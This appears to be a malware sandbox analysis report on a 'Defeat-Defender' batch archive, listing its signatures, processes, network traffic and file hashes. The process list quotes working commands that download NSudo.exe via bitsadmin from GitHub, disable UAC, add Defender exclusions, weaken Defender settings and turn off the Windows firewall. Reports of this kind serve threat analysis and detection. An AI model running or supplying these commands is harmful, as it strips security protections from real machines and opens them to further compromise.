Analysis Overview
SHA256
9a6e38be267702f3b397fdc416dc2d0d520239dc8d3d983e353e0422ac7941fe
Threat Level: Known bad
The file Defeat-Defender-V1.2.0-main.zip was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Modifies Windows Firewall
Command and Scripting Interpreter: PowerShell
Download via BitsAdmin
Legitimate hosting services abused for malware hosting/C2
Event Triggered Execution: Netsh Helper DLL
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: AddClipboardFormatListener
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Modifies registry class
Checks processor information in registry
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-06 19:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-06 19:33
Reported
2024-08-06 19:36
Platform
win7-20240729-en
Max time kernel
16s
Max time network
17s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2540 wrote to memory of 1716 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cacls.exe |
| PID 2540 wrote to memory of 1716 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cacls.exe |
| PID 2540 wrote to memory of 1716 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cacls.exe |
| PID 2540 wrote to memory of 2796 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wscript.exe |
| PID 2540 wrote to memory of 2796 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wscript.exe |
| PID 2540 wrote to memory of 2796 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wscript.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\Defeat-Defender.bat"
C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
C:\Windows\system32\wscript.exe
wscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs
Network
Files
C:\Users\Admin\AppData\Local\Temp\tmp.vbs
| MD5 | 9313d55e26ad30ddcbc046fe8013a21d |
| SHA1 | a5712ce8864d7b0ca88b94c64226dfeb2221457f |
| SHA256 | 121ab5b57fb09d3c520a7fd6dfaa5b87844e1e8379a9635e7a737934e7e9226a |
| SHA512 | 77b7f3c2aca2ba61519a9fed7dbb3e7f2dd803bd566eeb9531e1ed038dff68e88c4d2f73a83e37396fd475f57dbdef55966361176dde70d1343747aca5888ba7 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-06 19:33
Reported
2024-08-06 19:36
Platform
win10v2004-20240802-en
Max time kernel
149s
Max time network
148s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Defeat-Defender-V1.2.0-main\Defeat-Defender.bat"
C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
C:\Windows\system32\wscript.exe
wscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Documents\RestoreAdd.xlsx"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1996 -parentBuildID 20240401114208 -prefsHandle 1912 -prefMapHandle 1904 -prefsLen 23602 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {60673b37-9128-4018-9bd8-d6073175fef9} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2408 -parentBuildID 20240401114208 -prefsHandle 2400 -prefMapHandle 2396 -prefsLen 23638 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0634ca4-ec5b-462c-b5df-fa7b30041b7e} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2992 -childID 1 -isForBrowser -prefsHandle 2916 -prefMapHandle 2968 -prefsLen 23779 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cfc42829-52e8-4f35-93a7-c59cbeaf1372} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2744 -childID 2 -isForBrowser -prefsHandle 3700 -prefMapHandle 3696 -prefsLen 29012 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fa8c8459-94e9-49ef-b2d8-0c6251b42a25} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4712 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4716 -prefMapHandle 4756 -prefsLen 29012 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {46d0ee7c-afd8-4d62-a74f-ee81124ea5d6} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5460 -childID 3 -isForBrowser -prefsHandle 5452 -prefMapHandle 5448 -prefsLen 27068 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {11539aa5-ffc0-469e-ae2a-70d5f5ee2b4a} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5640 -childID 4 -isForBrowser -prefsHandle 5560 -prefMapHandle 5564 -prefsLen 27068 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b214495-18e7-4d1e-8ab2-67ba649de502} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5764 -childID 5 -isForBrowser -prefsHandle 5760 -prefMapHandle 5768 -prefsLen 27068 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc444eed-2e08-408a-8efa-d3f1868ae8d4} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5972 -childID 6 -isForBrowser -prefsHandle 5996 -prefMapHandle 5992 -prefsLen 27211 -prefMapSize 244628 -jsInitHandle 1280 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec55a889-6c6b-46a5-a0e9-fbd754832f4b} 2640 "\\.\pipe\gecko-crash-server-pipe.2640" tab
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | 161.99.165.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tracking-protection.cdn.mozilla.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | tracking-protection.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | tracking-protection.cdn.mozilla.net | udp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| N/A | 127.0.0.1:56645 | tcp | |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| US | 34.120.158.37:443 | tracking-protection.cdn.mozilla.net | tcp |
| N/A | 127.0.0.1:56652 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| NL | 142.250.179.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| NL | 142.250.179.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 196.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | location.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 35.190.72.216:443 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| NL | 142.250.179.174:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| FR | 23.200.86.251:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| NL | 142.250.179.174:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r1---sn-aigzrnsr.gvt1.com | udp |
| GB | 74.125.175.38:443 | r1---sn-aigzrnsr.gvt1.com | tcp |
| US | 8.8.8.8:53 | r1.sn-aigzrnsr.gvt1.com | udp |
| US | 8.8.8.8:53 | r1.sn-aigzrnsr.gvt1.com | udp |
| GB | 74.125.175.38:443 | r1.sn-aigzrnsr.gvt1.com | udp |
| US | 8.8.8.8:53 | 216.72.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.181.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.86.200.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.175.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\tmp.vbs
| MD5 | 9313d55e26ad30ddcbc046fe8013a21d |
| SHA1 | a5712ce8864d7b0ca88b94c64226dfeb2221457f |
| SHA256 | 121ab5b57fb09d3c520a7fd6dfaa5b87844e1e8379a9635e7a737934e7e9226a |
| SHA512 | 77b7f3c2aca2ba61519a9fed7dbb3e7f2dd803bd566eeb9531e1ed038dff68e88c4d2f73a83e37396fd475f57dbdef55966361176dde70d1343747aca5888ba7 |
memory/464-2-0x00007FFE9D653000-0x00007FFE9D655000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hgmx1ug2.uev.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/464-5-0x00000194BF000000-0x00000194BF022000-memory.dmp
memory/464-13-0x00007FFE9D650000-0x00007FFE9E111000-memory.dmp
memory/464-14-0x00007FFE9D650000-0x00007FFE9E111000-memory.dmp
memory/464-17-0x00007FFE9D650000-0x00007FFE9E111000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2bdac358d06bbc173ed9b971328b99be |
| SHA1 | b36ae68965e1989c12b33cbbdc873dbcb4863ef7 |
| SHA256 | b57143f72c786b38102de918ebf9248e1f8b1c13ddb50872d089750d6f12dc73 |
| SHA512 | 50a55652b4214d61f974f060112e7f9635236df05c105e365d9fa87cefb090bd1fd25f968ebdef74a0f9d06a914087dcbb0f5889189e64d8152ad69397bff4c3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 38f0f14cc7ca72ad51216866e66efb4e |
| SHA1 | 34ed0f47a4aaa95e786ca9f125b0341b38bfb9be |
| SHA256 | 668820fc659c9d229d32731ead41381eca0e5fb57232bbd3ef0118f5a21fc501 |
| SHA512 | 4a7d00c585784cf1aec6ed82d8c78542d2db3b9da30d8db20680a1ee9fd45b697207fbd459557336f2166d8b6ac17016f9e71c61ad351f2915bb163c8ed2b73a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6d42b6da621e8df5674e26b799c8e2aa |
| SHA1 | ab3ce1327ea1eeedb987ec823d5e0cb146bafa48 |
| SHA256 | 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c |
| SHA512 | 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 10890cda4b6eab618e926c4118ab0647 |
| SHA1 | 1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d |
| SHA256 | 00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14 |
| SHA512 | a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1aefe566d0c19c9e3ddaf9ea005f71c0 |
| SHA1 | 8d8cfb0d2192706100eb241f38a32b31f03329f1 |
| SHA256 | dc85b671f8ebac6cfa68897b1826019925c95a5ec36676fe18ba0085f437905a |
| SHA512 | f22782b33f7990a0783154fbe6d49e03f16c873a3b4c91f1fc5ed76d0e7b88f0df876ccdf007828ba4d9a5f97cb2362f922cbacad03de5804bc8abeb36cb2d09 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 083782a87bd50ffc86d70cbc6f04e275 |
| SHA1 | 0c11bc2b2c2cf33b17fff5e441881131ac1bee31 |
| SHA256 | 7a54dcc99ebfb850afde560857e2d1f764a53ff09efd03222f56ab547539798f |
| SHA512 | a7e56293e07acce20e69dceb13282e5d1eed2ef972a4c9cf1fb4f973b4b7d6a9ca8714fc547ab662842205383891372a2386fc3a12af3d7e4ef6a195f8a2bf02 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 217d9191dfd67252cef23229676c9eda |
| SHA1 | 80d940b01c28e3933b9d68b3e567adc2bac1289f |
| SHA256 | e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133 |
| SHA512 | 86767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757 |
memory/4600-129-0x00007FFE7B8F0000-0x00007FFE7B900000-memory.dmp
memory/4600-131-0x00007FFE7B8F0000-0x00007FFE7B900000-memory.dmp
memory/4600-130-0x00007FFE7B8F0000-0x00007FFE7B900000-memory.dmp
memory/4600-132-0x00007FFE7B8F0000-0x00007FFE7B900000-memory.dmp
memory/4600-133-0x00007FFE7B8F0000-0x00007FFE7B900000-memory.dmp
memory/4600-134-0x00007FFE791F0000-0x00007FFE79200000-memory.dmp
memory/4600-135-0x00007FFE791F0000-0x00007FFE79200000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
| MD5 | 6b17eb8d08a33b0d5b71a8dddff6ba01 |
| SHA1 | 42de4c02311cd9ddfa4093a3717e2b72f27fea7d |
| SHA256 | 11faf6d4b3ebc71622cb26c69f77cc905546d8602d47f3dac53edbca65321739 |
| SHA512 | 8111c1719144e9695eb3fe53a57bf3ec53552a535181c79b8d4297fb00c0095eb24fe432a004266df0f4c7091131b94ef7e8b0b4479c748c571b7092fd13f7e1 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | 663cf8b6a51e3ccbea23420ccc18c7a5 |
| SHA1 | b75f0003f5237a6e1d92bbd8b3ec09b46d61e64b |
| SHA256 | 93c62247bde13e9d81bdc94a4c4b25cdf8f1182a2ce3f71b9a5fad9d06f29dc2 |
| SHA512 | 26a3d419b05f87188bbf2c815e3dbc72c566c26dc922372508719dc1932bce2c369e6b3cc8042c534802ac5e9c517e1a1afa778b52434b9b9ec412244c82ff01 |
